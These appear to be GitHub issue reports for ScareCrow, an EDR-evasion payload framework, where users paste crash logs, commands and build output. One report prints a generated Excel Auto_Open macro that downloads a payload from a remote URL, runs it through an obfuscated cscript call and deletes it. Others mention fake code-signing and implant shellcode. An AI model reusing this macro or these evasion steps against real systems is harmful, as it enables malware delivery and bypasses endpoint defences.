main.main()
	/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:162 +0x90c

Binary crashes after overwriting pointer

The first error seems to be an access denied (0xc0000005)

./ScareCrow -I ~/Desktop/Payloads/payload.bin -console -domain www.microsoft.com

Example one

OneDrive.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1af93eea000 0xc00009c000
PC=0xc00009c000

syscall.Syscall(0xc00009c000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc00009c000
rbx 0x10b0920
rcx 0x0
rdi 0xef93e4e000
rsi 0xc00010fe40
rbp 0xc00010fde0
rsp 0xef941ffb88
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3e
r14 0x3d
r15 0xaa
rip 0xc00009c000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b

Example two - ran as administrator to see if the problem went away

cmd
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x196c2d26000 0xc000068000
PC=0xc000068000

syscall.Syscall(0xc000068000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/cmd.go:202 +0x658
rax 0xc000068000
rbx 0xf40920
rcx 0x0
rdi 0xd6c2cbe000
rsi 0xc0000c9e40
rbp 0xc0000c9de0
rsp 0xd6c2fff7e8
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3d
r14 0x3c
r15 0xaa
rip 0xc000068000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b

This appears to have been raised in #7 but I am using the latest version (I believe - I don't see a version number in the output) cloned today (18/03)

Generating Macro Go Error

Attempting to generate a macro payload but I am running into an error:

root@kali:/opt/ScareCrow# ./ScareCrow -I this.bin -Loader msiexec -domain www.microsoft.com -delivery macro -url http:///test.bin

[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With apphelp's Properties
[] Compiling Payload
[+] Payload Compiled
[] Signing apphelp.dll With a Fake Cert
[+] Signed File Created
[] Creating Loader
[] Macro Delivery Payload
[!] Excel macro that will download, execute and remove the payload:
Sub Auto_Open()
Dim UghEc As String
Dim wxnKct As String
Dim MmWsYRd As String
UghEc = Environ("AppData") & "\Microsoft\Excel"
VBA.ChDir UghEc

Dim QssSvuJy As String
Dim nKgV As String
Dim gcxBaK As Object

QssSvuJy = "http://redacted"
nKgV = ""
Set gcxBaK = CreateObject("Microsoft.XMLHTTP")
gcxBaK.Open "GET", QssSvuJy, False
gcxBaK.send

    If gcxBaK.Status = 200 Then
    Set EMKAG = CreateObject("ADODB.Stream")
    EMKAG.Open
    EMKAG.Type = 1
    EMKAG.Write gcxBaK.responseBody
    EMKAG.SaveToFile nKgV, 2
    EMKAG.Close
End If
wxnKct = UghEc & nKgV
Set AxJpqt = GetObject("new:0006F03A-0000-0000-C000-000000000046")
    AxJpqt.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & wxnKct), 0
    vLokSZ
    Kill wxnKct
    End Sub
    Sub vLokSZ()
    Dim when As Variant
            Debug.Print "Start " & Now
            when = Now + TimeValue("00:00:30")
            Do While when > Now
                    DoEvents
            Loop
            Debug.Print "End " & Now
    End Sub

panic: open : no such file or directory

goroutine 1 [running]:
ScareCrow/Utils.check(...)
/opt/ScareCrow/Utils/Utils.go:27
ScareCrow/Utils.Writefile(0x0, 0x0, 0xc0020d8000, 0x2b0dc6)
/opt/ScareCrow/Utils/Utils.go:19 +0x145
ScareCrow/Loader.CompileLoader(0x7ffd34ebce04, 0x7, 0x0, 0x0, 0xc0000b22e0, 0xb, 0x781332, 0x7, 0x7ffd34ebce30, 0x5, ...)
/opt/ScareCrow/Loader/Loader.go:1010 +0x585
main.main()
/opt/ScareCrow/ScareCrow.go:193 +0xb1b

It looks like its just getting cut off a bit soon or something.

cmd.Run

When giving it a pkcs7 code signed cert it looks to be finishing up building and then i receive a cmd.Run() error.

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With schannel's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing schannel.dll With a Valid Cert <file>.p7b
2022/02/25 11:57:49 cmd.Run() failed with exit status 255

Additionally, my network needs a proxy for it to create a fake cert based on domain. Can you include that as an option to use a proxy to create a fake cert?

Binary loader not working with Donut shellcode

I am generating shellcode with donut, specifying x64. The CPL loader works as expected, but the binary loader does not:

The shellcode is being generated from Atlas, a .NET implant, if that makes a difference. Could this be related to #7?